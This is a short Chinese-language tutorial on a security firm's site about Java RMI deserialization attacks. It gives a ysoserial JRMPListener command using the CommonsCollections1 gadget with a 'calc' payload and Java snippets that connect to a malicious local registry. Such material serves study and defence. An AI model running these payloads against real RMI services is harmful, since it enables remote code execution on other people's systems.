联系电话

18696195380/18672920250

QQ客服

3329043 QQ群:594653844
网站导航

新闻资讯

当前位置:首页 > 新闻资讯

java安全-02RMI

发布时间:2022-03-28

简要描述:

攻击方式注册端攻击服务端java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
public static void main(...

立即咨询 服务电话:18696195380/18672920250
详细介绍

攻击方式

注册端攻击服务端

java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
    public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {        //开启一个恶意的reg,然后server去过去链接注册,则会中招        String url = "rmi://127.0.0.1:1099/setUser";        Naming.unbind(url);    }

注册端攻击客户端

    public static void main(String[] args) {        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"        try{            String url = "rmi://127.0.0.1:1099/exp";            User user = (User) Naming.lookup(url);
        }catch(Exception e){            e.printStackTrace();        }    }

服务端攻击注册端

  1. 注册端开启

  1. Server端利用CC1进行攻击

服务端攻击客户端

  1. 服务端将恶意类注册

  1. 客户端加载执行

 


上一篇:基于 5G 网络的垂直行业专用安全保障方法探讨​

下一篇:数据安全产业发展研讨会——数据传输安全专题会议顺利召开

推荐产品

如果您有任何问题,请跟我们联系!

联系我们

Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5

地址:武汉市东湖高新区光谷大道光谷世贸中心A栋23楼

在线客服 联系方式 二维码

咨询在线客服

服务热线

18696195380/18672920250

扫一扫,关注我们

关闭